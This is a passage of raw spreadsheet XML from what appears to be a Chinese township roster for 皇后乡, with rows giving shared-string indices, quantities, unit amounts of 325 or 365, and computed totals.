      <c r="A1816" s="23" t="s">
        <v>4878</v>
      </c>
      <c r="B1816" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1816" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1816" s="24" t="s">
        <v>4879</v>
      </c>
      <c r="E1816" s="24" t="s">
        <v>4880</v>
      </c>
      <c r="F1816" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1816" s="24">
        <v>2</v>
      </c>
      <c r="H1816" s="25">
        <v>325</v>
      </c>
      <c r="I1816" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1816" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1816" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1817" customHeight="1" spans="1:11">
      <c r="A1817" s="23" t="s">
        <v>4881</v>
      </c>
      <c r="B1817" s="24" t="str">
        <f>B1816</f>
        <v>皇后乡</v>
      </c>
      <c r="C1817" s="24" t="str">
        <f>C1816</f>
        <v>皇后乡</v>
      </c>
      <c r="D1817" s="23" t="s">
        <v>4882</v>
      </c>
      <c r="E1817" s="23" t="s">
        <v>4838</v>
      </c>
      <c r="F1817" s="24" t="str">
        <f>F1816</f>
        <v>4113210615</v>
      </c>
      <c r="G1817" s="24"/>
      <c r="H1817" s="24"/>
      <c r="I1817" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1817" s="24"/>
      <c r="K1817" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1818" customHeight="1" spans="1:11">
      <c r="A1818" s="23" t="s">
        <v>4883</v>
      </c>
      <c r="B1818" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1818" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1818" s="24" t="s">
        <v>4884</v>
      </c>
      <c r="E1818" s="24" t="s">
        <v>4778</v>
      </c>
      <c r="F1818" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1818" s="24">
        <v>1</v>
      </c>
      <c r="H1818" s="25">
        <v>365</v>
      </c>
      <c r="I1818" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1818" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1818" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1819" customHeight="1" spans="1:11">
      <c r="A1819" s="23" t="s">
        <v>4885</v>
      </c>
      <c r="B1819" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1819" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1819" s="24" t="s">
        <v>4886</v>
      </c>
      <c r="E1819" s="24" t="s">
        <v>4887</v>
      </c>
      <c r="F1819" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1819" s="24">
        <v>1</v>
      </c>
      <c r="H1819" s="25">
        <v>365</v>
      </c>
      <c r="I1819" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1819" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1819" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1820" customHeight="1" spans="1:11">
      <c r="A1820" s="23" t="s">
        <v>4888</v>
      </c>
      <c r="B1820" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1820" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1820" s="24" t="s">
        <v>4889</v>
      </c>
      <c r="E1820" s="24" t="s">
        <v>4792</v>
      </c>
      <c r="F1820" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1820" s="24">
        <v>1</v>
      </c>
      <c r="H1820" s="25">
        <v>365</v>
      </c>
      <c r="I1820" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1820" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1820" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1821" customHeight="1" spans="1:11">
      <c r="A1821" s="23" t="s">
        <v>4890</v>
      </c>
      <c r="B1821" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1821" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1821" s="24" t="s">
        <v>4891</v>
      </c>
      <c r="E1821" s="24" t="s">
        <v>4892</v>
      </c>
      <c r="F1821" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1821" s="24">
        <v>2</v>
      </c>
      <c r="H1821" s="25">
        <v>325</v>
      </c>
      <c r="I1821" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1821" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1821" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1822" customHeight="1" spans="1:11">
      <c r="A1822" s="23" t="s">
        <v>4893</v>
      </c>
      <c r="B1822" s="24" t="str">
        <f>B1821</f>
        <v>皇后乡</v>
      </c>
      <c r="C1822" s="24" t="str">
        <f>C1821</f>
        <v>皇后乡</v>
      </c>
      <c r="D1822" s="23" t="s">
        <v>4894</v>
      </c>
      <c r="E1822" s="23" t="s">
        <v>4713</v>
      </c>
      <c r="F1822" s="24" t="str">
        <f>F1821</f>
        <v>4113210615</v>
      </c>
      <c r="G1822" s="24"/>
      <c r="H1822" s="24"/>
      <c r="I1822" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1822" s="24"/>
      <c r="K1822" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1823" customHeight="1" spans="1:11">
      <c r="A1823" s="23" t="s">
        <v>4895</v>
      </c>
      <c r="B1823" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1823" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1823" s="24" t="s">
        <v>4896</v>
      </c>
      <c r="E1823" s="24" t="s">
        <v>4761</v>
      </c>
      <c r="F1823" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1823" s="24">
        <v>1</v>
      </c>
      <c r="H1823" s="25">
        <v>365</v>
      </c>
      <c r="I1823" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1823" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1823" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1824" customHeight="1" spans="1:11">
      <c r="A1824" s="23" t="s">
        <v>4897</v>
      </c>
      <c r="B1824" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1824" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1824" s="24" t="s">
        <v>4898</v>
      </c>
      <c r="E1824" s="24" t="s">
        <v>4775</v>
      </c>
      <c r="F1824" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1824" s="24">
        <v>2</v>
      </c>
      <c r="H1824" s="25">
        <v>325</v>
      </c>
      <c r="I1824" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1824" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1824" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1825" customHeight="1" spans="1:11">
      <c r="A1825" s="23" t="s">
        <v>4899</v>
      </c>
      <c r="B1825" s="24" t="str">
        <f>B1824</f>
        <v>皇后乡</v>
      </c>
      <c r="C1825" s="24" t="str">
        <f>C1824</f>
        <v>皇后乡</v>
      </c>
      <c r="D1825" s="23" t="s">
        <v>4900</v>
      </c>
      <c r="E1825" s="23" t="s">
        <v>4847</v>
      </c>
      <c r="F1825" s="24" t="str">
        <f>F1824</f>
        <v>4113210615</v>
      </c>
      <c r="G1825" s="24"/>
      <c r="H1825" s="24"/>
      <c r="I1825" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1825" s="24"/>
      <c r="K1825" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1826" customHeight="1" spans="1:11">
      <c r="A1826" s="23" t="s">
        <v>4901</v>
      </c>
      <c r="B1826" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1826" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1826" s="24" t="s">
        <v>4902</v>
      </c>
      <c r="E1826" s="24" t="s">
        <v>4903</v>
      </c>
      <c r="F1826" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1826" s="24">
        <v>1</v>
      </c>
      <c r="H1826" s="25">
        <v>365</v>
      </c>
      <c r="I1826" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1826" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1826" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1827" customHeight="1" spans="1:11">
      <c r="A1827" s="23" t="s">
        <v>4904</v>
      </c>
      <c r="B1827" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1827" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1827" s="24" t="s">
        <v>4905</v>
      </c>
      <c r="E1827" s="24" t="s">
        <v>4738</v>
      </c>
      <c r="F1827" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1827" s="24">
        <v>1</v>
      </c>
      <c r="H1827" s="25">
        <v>365</v>
      </c>
      <c r="I1827" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1827" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1827" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1828" customHeight="1" spans="1:11">
      <c r="A1828" s="23" t="s">
        <v>4906</v>
      </c>
      <c r="B1828" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1828" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1828" s="24" t="s">
        <v>4907</v>
      </c>
      <c r="E1828" s="24" t="s">
        <v>4709</v>
      </c>
      <c r="F1828" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1828" s="24">
        <v>2</v>
      </c>
      <c r="H1828" s="25">
        <v>325</v>
      </c>
      <c r="I1828" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1828" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1828" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1829" customHeight="1" spans="1:11">
      <c r="A1829" s="23" t="s">
        <v>4908</v>
      </c>
      <c r="B1829" s="24" t="str">
        <f>B1828</f>
        <v>皇后乡</v>
      </c>
      <c r="C1829" s="24" t="str">
        <f>C1828</f>
        <v>皇后乡</v>
      </c>
      <c r="D1829" s="23" t="s">
        <v>4909</v>
      </c>
      <c r="E1829" s="23" t="s">
        <v>4778</v>
      </c>
      <c r="F1829" s="24" t="str">
        <f>F1828</f>
        <v>4113210615</v>
      </c>
      <c r="G1829" s="24"/>
      <c r="H1829" s="24"/>
      <c r="I1829" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1829" s="24"/>
      <c r="K1829" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1830" customHeight="1" spans="1:11">
      <c r="A1830" s="23" t="s">
        <v>4910</v>
      </c>
      <c r="B1830" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1830" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1830" s="24" t="s">
        <v>4911</v>
      </c>
      <c r="E1830" s="24" t="s">
        <v>4892</v>
      </c>
      <c r="F1830" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1830" s="24">
        <v>2</v>
      </c>
      <c r="H1830" s="25">
        <v>325</v>
      </c>
      <c r="I1830" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1830" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1830" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1831" customHeight="1" spans="1:11">
      <c r="A1831" s="23" t="s">
        <v>4912</v>
      </c>
      <c r="B1831" s="24" t="str">
        <f>B1830</f>
        <v>皇后乡</v>
      </c>
      <c r="C1831" s="24" t="str">
        <f>C1830</f>
        <v>皇后乡</v>
      </c>
      <c r="D1831" s="23" t="s">
        <v>4913</v>
      </c>
      <c r="E1831" s="23" t="s">
        <v>4914</v>
      </c>
      <c r="F1831" s="24" t="str">
        <f>F1830</f>
        <v>4113210615</v>
      </c>
      <c r="G1831" s="24"/>
      <c r="H1831" s="24"/>
      <c r="I1831" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1831" s="24"/>
      <c r="K1831" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1832" customHeight="1" spans="1:11">
      <c r="A1832" s="23" t="s">
        <v>4915</v>
      </c>
      <c r="B1832" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1832" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1832" s="24" t="s">
        <v>4916</v>
      </c>
      <c r="E1832" s="24" t="s">
        <v>4917</v>
      </c>
      <c r="F1832" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1832" s="24">
        <v>2</v>
      </c>
      <c r="H1832" s="25">
        <v>325</v>
      </c>
      <c r="I1832" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1832" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1832" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1833" customHeight="1" spans="1:11">
      <c r="A1833" s="23" t="s">
        <v>4918</v>
      </c>
      <c r="B1833" s="24" t="str">
        <f>B1832</f>
        <v>皇后乡</v>
      </c>
      <c r="C1833" s="24" t="str">
        <f>C1832</f>
        <v>皇后乡</v>
      </c>
      <c r="D1833" s="23" t="s">
        <v>4919</v>
      </c>
      <c r="E1833" s="23" t="s">
        <v>4792</v>
      </c>
      <c r="F1833" s="24" t="str">
        <f>F1832</f>
        <v>4113210615</v>
      </c>
      <c r="G1833" s="24"/>
      <c r="H1833" s="24"/>
      <c r="I1833" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1833" s="24"/>
      <c r="K1833" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1834" customHeight="1" spans="1:11">
      <c r="A1834" s="23" t="s">
        <v>4920</v>
      </c>
      <c r="B1834" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1834" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1834" s="24" t="s">
        <v>4921</v>
      </c>
      <c r="E1834" s="24" t="s">
        <v>4825</v>
      </c>
      <c r="F1834" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1834" s="24">
        <v>2</v>
      </c>
      <c r="H1834" s="25">
        <v>325</v>
      </c>
      <c r="I1834" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1834" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1834" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1835" customHeight="1" spans="1:11">
      <c r="A1835" s="23" t="s">
        <v>4922</v>
      </c>
      <c r="B1835" s="24" t="str">
        <f>B1834</f>
        <v>皇后乡</v>
      </c>
      <c r="C1835" s="24" t="str">
        <f>C1834</f>
        <v>皇后乡</v>
      </c>
      <c r="D1835" s="23" t="s">
        <v>4923</v>
      </c>
      <c r="E1835" s="23" t="s">
        <v>4887</v>
      </c>
      <c r="F1835" s="24" t="str">
        <f>F1834</f>
        <v>4113210615</v>
      </c>
      <c r="G1835" s="24"/>
      <c r="H1835" s="24"/>
      <c r="I1835" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1835" s="24"/>
      <c r="K1835" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1836" customHeight="1" spans="1:11">
      <c r="A1836" s="23" t="s">
        <v>4924</v>
      </c>
      <c r="B1836" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1836" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1836" s="24" t="s">
        <v>4925</v>
      </c>
      <c r="E1836" s="24" t="s">
        <v>4788</v>
      </c>
      <c r="F1836" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1836" s="24">
        <v>1</v>
      </c>
      <c r="H1836" s="25">
        <v>365</v>
      </c>
      <c r="I1836" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1836" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1836" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1837" customHeight="1" spans="1:11">
      <c r="A1837" s="23" t="s">
        <v>4926</v>
      </c>
      <c r="B1837" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1837" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1837" s="24" t="s">
        <v>4927</v>
      </c>
      <c r="E1837" s="24" t="s">
        <v>4892</v>
      </c>
      <c r="F1837" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1837" s="24">
        <v>2</v>
      </c>
      <c r="H1837" s="25">
        <v>325</v>
      </c>
      <c r="I1837" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1837" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1837" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1838" customHeight="1" spans="1:11">
      <c r="A1838" s="23" t="s">
        <v>4928</v>
      </c>
      <c r="B1838" s="24" t="str">
        <f>B1837</f>
        <v>皇后乡</v>
      </c>
      <c r="C1838" s="24" t="str">
        <f>C1837</f>
        <v>皇后乡</v>
      </c>
      <c r="D1838" s="23" t="s">
        <v>4929</v>
      </c>
      <c r="E1838" s="23" t="s">
        <v>4838</v>
      </c>
      <c r="F1838" s="24" t="str">
        <f>F1837</f>
        <v>4113210615</v>
      </c>
      <c r="G1838" s="24"/>
      <c r="H1838" s="24"/>
      <c r="I1838" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1838" s="24"/>
      <c r="K1838" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1839" customHeight="1" spans="1:11">
      <c r="A1839" s="23" t="s">
        <v>4930</v>
      </c>
      <c r="B1839" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1839" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1839" s="24" t="s">
        <v>4931</v>
      </c>
      <c r="E1839" s="24" t="s">
        <v>4932</v>
      </c>
      <c r="F1839" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1839" s="24">
        <v>1</v>
      </c>
      <c r="H1839" s="25">
        <v>365</v>
      </c>
      <c r="I1839" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1839" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1839" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1840" customHeight="1" spans="1:11">
      <c r="A1840" s="23" t="s">
        <v>4933</v>
      </c>
      <c r="B1840" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1840" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1840" s="24" t="s">
        <v>4934</v>
      </c>
      <c r="E1840" s="24" t="s">
        <v>4935</v>
      </c>
      <c r="F1840" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1840" s="24">
        <v>2</v>
      </c>
      <c r="H1840" s="25">
        <v>325</v>
      </c>
      <c r="I1840" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1840" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1840" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1841" customHeight="1" spans="1:11">
      <c r="A1841" s="23" t="s">
        <v>4936</v>
      </c>
      <c r="B1841" s="24" t="str">
        <f>B1840</f>
        <v>皇后乡</v>
      </c>
      <c r="C1841" s="24" t="str">
        <f>C1840</f>
        <v>皇后乡</v>
      </c>
      <c r="D1841" s="23" t="s">
        <v>4937</v>
      </c>
      <c r="E1841" s="23" t="s">
        <v>4778</v>
      </c>
      <c r="F1841" s="24" t="str">
        <f>F1840</f>
        <v>4113210615</v>
      </c>
      <c r="G1841" s="24"/>
      <c r="H1841" s="24"/>
      <c r="I1841" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1841" s="24"/>
      <c r="K1841" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1842" customHeight="1" spans="1:11">
      <c r="A1842" s="23" t="s">
        <v>4938</v>
      </c>
      <c r="B1842" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1842" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1842" s="24" t="s">
        <v>4939</v>
      </c>
      <c r="E1842" s="24" t="s">
        <v>4716</v>
      </c>
      <c r="F1842" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1842" s="24">
        <v>2</v>
      </c>
      <c r="H1842" s="25">
        <v>325</v>
      </c>
      <c r="I1842" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1842" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1842" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1843" customHeight="1" spans="1:11">
      <c r="A1843" s="23" t="s">
        <v>4940</v>
      </c>
      <c r="B1843" s="24" t="str">
        <f>B1842</f>
        <v>皇后乡</v>
      </c>
      <c r="C1843" s="24" t="str">
        <f>C1842</f>
        <v>皇后乡</v>
      </c>
      <c r="D1843" s="23" t="s">
        <v>4941</v>
      </c>
      <c r="E1843" s="23" t="s">
        <v>4797</v>
      </c>
      <c r="F1843" s="24" t="str">
        <f>F1842</f>
        <v>4113210615</v>
      </c>
      <c r="G1843" s="24"/>
      <c r="H1843" s="24"/>
      <c r="I1843" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1843" s="24"/>
      <c r="K1843" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1844" customHeight="1" spans="1:11">
      <c r="A1844" s="23" t="s">
        <v>4942</v>
      </c>
      <c r="B1844" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1844" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1844" s="24" t="s">
        <v>4943</v>
      </c>
      <c r="E1844" s="24" t="s">
        <v>4853</v>
      </c>
      <c r="F1844" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1844" s="24">
        <v>2</v>
      </c>
      <c r="H1844" s="25">
        <v>325</v>
      </c>
      <c r="I1844" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1844" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1844" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1845" customHeight="1" spans="1:11">
      <c r="A1845" s="23" t="s">
        <v>4944</v>
      </c>
      <c r="B1845" s="24" t="str">
        <f>B1844</f>
        <v>皇后乡</v>
      </c>
      <c r="C1845" s="24" t="str">
        <f>C1844</f>
        <v>皇后乡</v>
      </c>
      <c r="D1845" s="23" t="s">
        <v>4945</v>
      </c>
      <c r="E1845" s="23" t="s">
        <v>4877</v>
      </c>
      <c r="F1845" s="24" t="str">
        <f>F1844</f>
        <v>4113210615</v>
      </c>
      <c r="G1845" s="24"/>
      <c r="H1845" s="24"/>
      <c r="I1845" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1845" s="24"/>
      <c r="K1845" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1846" customHeight="1" spans="1:11">
      <c r="A1846" s="23" t="s">
        <v>4946</v>
      </c>
      <c r="B1846" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1846" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1846" s="24" t="s">
        <v>4947</v>
      </c>
      <c r="E1846" s="24" t="s">
        <v>4724</v>
      </c>
      <c r="F1846" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1846" s="24">
        <v>2</v>
      </c>
      <c r="H1846" s="25">
        <v>325</v>
      </c>
      <c r="I1846" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1846" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1846" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1847" customHeight="1" spans="1:11">
      <c r="A1847" s="23" t="s">
        <v>4948</v>
      </c>
      <c r="B1847" s="24" t="str">
        <f>B1846</f>
        <v>皇后乡</v>
      </c>
      <c r="C1847" s="24" t="str">
        <f>C1846</f>
        <v>皇后乡</v>
      </c>
      <c r="D1847" s="23" t="s">
        <v>1131</v>
      </c>
      <c r="E1847" s="23" t="s">
        <v>4949</v>
      </c>
      <c r="F1847" s="24" t="str">
        <f>F1846</f>
        <v>4113210615</v>
      </c>
      <c r="G1847" s="24"/>
      <c r="H1847" s="24"/>
      <c r="I1847" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1847" s="24"/>
      <c r="K1847" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1848" customHeight="1" spans="1:11">
      <c r="A1848" s="23" t="s">
        <v>4950</v>
      </c>
      <c r="B1848" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1848" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1848" s="24" t="s">
        <v>4951</v>
      </c>
      <c r="E1848" s="24" t="s">
        <v>4828</v>
      </c>
      <c r="F1848" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1848" s="24">
        <v>2</v>
      </c>
      <c r="H1848" s="25">
        <v>325</v>
      </c>
      <c r="I1848" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1848" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1848" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1849" customHeight="1" spans="1:11">
      <c r="A1849" s="23" t="s">
        <v>4952</v>
      </c>
      <c r="B1849" s="24" t="str">
        <f>B1848</f>
        <v>皇后乡</v>
      </c>
      <c r="C1849" s="24" t="str">
        <f>C1848</f>
        <v>皇后乡</v>
      </c>
      <c r="D1849" s="23" t="s">
        <v>4953</v>
      </c>
      <c r="E1849" s="23" t="s">
        <v>4847</v>
      </c>
      <c r="F1849" s="24" t="str">
        <f>F1848</f>
        <v>4113210615</v>
      </c>
      <c r="G1849" s="24"/>
      <c r="H1849" s="24"/>
      <c r="I1849" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1849" s="24"/>
      <c r="K1849" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1850" customHeight="1" spans="1:11">
      <c r="A1850" s="23" t="s">
        <v>4954</v>
      </c>
      <c r="B1850" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1850" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1850" s="24" t="s">
        <v>4955</v>
      </c>
      <c r="E1850" s="24" t="s">
        <v>4709</v>
      </c>
      <c r="F1850" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1850" s="24">
        <v>1</v>
      </c>
      <c r="H1850" s="25">
        <v>365</v>
      </c>
      <c r="I1850" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1850" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1850" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1851" customHeight="1" spans="1:11">
      <c r="A1851" s="23" t="s">
        <v>4956</v>
      </c>
      <c r="B1851" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1851" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1851" s="24" t="s">
        <v>4857</v>
      </c>
      <c r="E1851" s="24" t="s">
        <v>4730</v>
      </c>
      <c r="F1851" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1851" s="24">
        <v>1</v>
      </c>
      <c r="H1851" s="25">
        <v>365</v>
      </c>
      <c r="I1851" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1851" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1851" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1852" customHeight="1" spans="1:11">
      <c r="A1852" s="23" t="s">
        <v>4957</v>
      </c>
      <c r="B1852" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1852" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1852" s="24" t="s">
        <v>4958</v>
      </c>
      <c r="E1852" s="24" t="s">
        <v>4959</v>
      </c>
      <c r="F1852" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1852" s="24">
        <v>1</v>
      </c>
      <c r="H1852" s="25">
        <v>365</v>
      </c>
      <c r="I1852" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1852" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1852" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1853" customHeight="1" spans="1:11">
      <c r="A1853" s="23" t="s">
        <v>4960</v>
      </c>
      <c r="B1853" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1853" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1853" s="24" t="s">
        <v>4961</v>
      </c>
      <c r="E1853" s="24" t="s">
        <v>4962</v>
      </c>
      <c r="F1853" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1853" s="24">
        <v>2</v>
      </c>
      <c r="H1853" s="25">
        <v>325</v>
      </c>
      <c r="I1853" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1853" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1853" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1854" customHeight="1" spans="1:11">
      <c r="A1854" s="23" t="s">
        <v>4963</v>
      </c>
      <c r="B1854" s="24" t="str">
        <f>B1853</f>
        <v>皇后乡</v>
      </c>
      <c r="C1854" s="24" t="str">
        <f>C1853</f>
        <v>皇后乡</v>
      </c>
      <c r="D1854" s="23" t="s">
        <v>4964</v>
      </c>
      <c r="E1854" s="23" t="s">
        <v>2199</v>
      </c>
